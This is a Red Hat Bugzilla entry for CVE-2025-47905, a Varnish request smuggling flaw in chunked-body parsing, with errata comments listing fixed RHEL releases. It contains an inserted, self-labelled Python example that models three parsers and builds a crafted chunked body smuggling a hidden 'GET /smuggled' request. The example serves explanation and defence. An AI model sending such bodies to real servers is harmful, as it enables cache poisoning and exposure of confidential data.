Bug 2364235 (CVE-2025-47905)

Summary: CVE-2025-47905 varnish: request smuggling attacks
Product: [Other] Security Response
Reporter: OSIDB Bzimport <bzimport>
Component: vulnerability
Assignee: Product Security DevOps Team <prodsec-dev>
Status: NEW ---
QA Contact:
Severity: high
Docs Contact:
Priority: high
Version: unspecified
CC: security-response-team
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version:
Doc Type: ---
Doc Text:
A vulnerability was found in Varnish Cache. This vulnerability may allow request smuggling attacks, where a malicious actor can craft seemingly legitimate HTTP requests. This issue could result in an unspecified system caching incorrect content that can expose confidential information.
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:
Bug Depends On: 2369404
Bug Blocks:
Deadline: 2025-05-12

Description OSIDB Bzimport 2025-05-05 20:54:13 UTC
This vulnerability may allow for request smuggling attacks, potentially resulting in an unspecified system caching incorrect content. 

The bug is an error in how a chunked message body is parsed. The RFC says to use only the CRLF sequence to end a line: https://www.rfc-editor.org/rfc/rfc9112.html#name-chunked-transfer-coding
However, Varnish has up until now mistakenly treated whitespace as a line ending as well. This allows a client to construct an HTTP/1 request that smuggles another malicious request in the body of the first request. When this is used against an endpoint that is blindly forwarding HTTP requests, it can give this client ways to abuse this behavior of Varnish.
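The parsing disagreement described in the comment above, as an added example that is not part of this bug report and not Varnish's own code. It models three ways a chunk-size line can be terminated: the buggy behaviour the advisory describes (a space or tab ends the line, so bytes after it become chunk data), a hypothetical tolerant peer that ignores everything after the size up to CRLF (an assumption about some downstream server, not a claim about any named product), and the RFC 9112 grammar (CRLF only, optional `;` chunk extension). The request body, the `/smuggled` path and `backend.internal` host are constructed for the example. The point the code makes: the same bytes decode to different chunk boundaries under the first two parsers, so one of them finishes the body early and treats the remainder as a second request, while the strict parser rejects the body outright.

```python
"""Chunked-body parsing models for CVE-2025-47905 (constructed example, not Varnish code)."""

HEX_DIGITS = b"0123456789abcdefABCDEF"

# Three ways a parser may decide where a chunk-size line ends:
#   whitespace_ends_line  models the Varnish bug: SP/HTAB after the size ends the line
#   junk_until_crlf       hypothetical tolerant peer: ignore everything up to CRLF
#   rfc9112_strict        RFC 9112: chunk-size [ chunk-ext ] CRLF, nothing else
MODES = ("whitespace_ends_line", "junk_until_crlf", "rfc9112_strict")


def _read_size_line(data: bytes, pos: int, mode: str) -> tuple[int, int]:
    """Parse one chunk-size line at pos; return (chunk_size, offset of first data byte)."""
    start = pos
    while pos < len(data) and data[pos] in HEX_DIGITS:
        pos += 1
    if pos == start:
        raise ValueError(f"no chunk-size hex digits at offset {start}")
    size = int(data[start:pos], 16)

    if mode == "whitespace_ends_line":
        # The bug: a space or tab is accepted as end-of-line, so whatever follows it
        # on the same physical line is consumed as chunk data.
        if data[pos:pos + 1] in (b" ", b"\t"):
            return size, pos + 1
        if data[pos:pos + 2] == b"\r\n":
            return size, pos + 2
        raise ValueError(f"bad chunk-size line terminator at offset {pos}")

    if mode == "junk_until_crlf":
        end = data.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("chunk-size line without CRLF")
        return size, end + 2

    if mode == "rfc9112_strict":
        p = pos
        while p < len(data) and data[p] in b" \t":   # BWS is only allowed before ';'
            p += 1
        if data[p:p + 1] == b";":                      # chunk-ext: skip to CRLF
            end = data.find(b"\r\n", p)
            if end < 0:
                raise ValueError("chunk-ext without CRLF")
            return size, end + 2
        if p == pos and data[pos:pos + 2] == b"\r\n":
            return size, pos + 2
        raise ValueError(f"unexpected byte {data[p:p + 1]!r} after chunk-size at offset {p}")

    raise ValueError(f"unknown mode {mode}")


def decode_chunked(data: bytes, mode: str) -> tuple[bytes, bytes]:
    """Decode a chunked body; return (decoded_body, leftover_bytes).

    Leftover bytes are what a server keeping the connection open reads as the
    *next* request, so two peers that disagree on them are desynchronised.
    """
    out, pos = bytearray(), 0
    while True:
        size, pos = _read_size_line(data, pos, mode)
        if size == 0:
            break
        chunk = data[pos:pos + size]
        if len(chunk) != size:
            raise ValueError(f"chunk truncated at offset {pos}")
        out += chunk
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError(f"chunk data not followed by CRLF at offset {pos}")
        pos += 2
    while True:                      # trailer section ends at an empty line
        end = data.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("unterminated trailer section")
        line, pos = data[pos:end], end + 2
        if not line:
            break
    return bytes(out), data[pos:]


def rejects(data: bytes, mode: str) -> bool:
    """True if the parser in this mode refuses the body (the safe outcome)."""
    try:
        decode_chunked(data, mode)
    except ValueError:
        return True
    return False


def build_smuggling_body(hidden: bytes) -> bytes:
    """Constructed attacker body (assumption, not taken from the advisory) whose chunk
    boundaries differ between the whitespace-tolerant and the CRLF-based parsers."""
    last_chunk = b"0\r\n\r\n"
    big = b"%X" % (len(last_chunk) + len(hidden))   # size covering last_chunk + hidden
    filler = b"x" * len(big)
    # First line "N xx\r\n": the whitespace parser takes size N and data "xx" from this
    # line; a CRLF-based parser takes size N and then reads `big` as its data, so the
    # two parsers start the second chunk-size line at different offsets.
    first = b"%X " % len(big) + filler + b"\r\n"
    return first + big + b"\r\n" + last_chunk + hidden + b"\r\n" + last_chunk


# Constructed sample: a second request hidden inside the first request's body.
HIDDEN = b"GET /smuggled HTTP/1.1\r\nHost: backend.internal\r\n\r\n"
SMUGGLING_BODY = build_smuggling_body(HIDDEN)


def compare(body: bytes = SMUGGLING_BODY) -> dict:
    """Decode the same bytes with each parser model."""
    return {m: ("rejected" if rejects(body, m) else decode_chunked(body, m)) for m in MODES}


if __name__ == "__main__":
    for mode, result in compare().items():
        print(f"{mode:22s} -> {result!r}")
```

Running it shows the whitespace-tolerant parser swallowing the whole body (the hidden request is just chunk data to it, so it would forward it unseen), the tolerant CRLF-based peer stopping after a two-byte body and leaving `GET /smuggled ...` as the next request on the connection, and the strict parser rejecting the first chunk-size line. Which hop ends up executing the hidden request depends on the real backend's parser, which this model does not claim to reproduce; the defence the advisory implies is the strict branch: only CRLF terminates a chunk-size line.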

Comment 2 errata-xmlrpc 2025-05-29 08:45:08 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.8 Extended Update Support

Via RHSA-2025:8294 https://access.redhat.com/errata/RHSA-2025:8294

Comment 3 errata-xmlrpc 2025-05-29 12:33:29 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support
  Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions
  Red Hat Enterprise Linux 8.6 Telecommunications Update Service

Via RHSA-2025:8310 https://access.redhat.com/errata/RHSA-2025:8310

Comment 4 errata-xmlrpc 2025-06-02 01:53:22 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.2 Advanced Update Support

Via RHSA-2025:8339 https://access.redhat.com/errata/RHSA-2025:8339

Comment 5 errata-xmlrpc 2025-06-02 02:11:48 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support
  Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions
  Red Hat Enterprise Linux 8.4 Telecommunications Update Service

Via RHSA-2025:8340 https://access.redhat.com/errata/RHSA-2025:8340

Comment 6 errata-xmlrpc 2025-06-02 02:13:19 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2025:8337 https://access.redhat.com/errata/RHSA-2025:8337

Comment 7 errata-xmlrpc 2025-06-02 03:03:06 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions

Via RHSA-2025:8350 https://access.redhat.com/errata/RHSA-2025:8350

Comment 8 errata-xmlrpc 2025-06-02 03:09:21 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9.4 Extended Update Support

Via RHSA-2025:8349 https://access.redhat.com/errata/RHSA-2025:8349

Comment 9 errata-xmlrpc 2025-06-02 03:14:11 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9.2 Extended Update Support

Via RHSA-2025:8351 https://access.redhat.com/errata/RHSA-2025:8351

Comment 10 errata-xmlrpc 2025-06-02 03:17:34 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2025:8336 https://access.redhat.com/errata/RHSA-2025:8336

Comment 12 errata-xmlrpc 2025-06-04 22:24:39 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 10

Via RHSA-2025:8550 https://access.redhat.com/errata/RHSA-2025:8550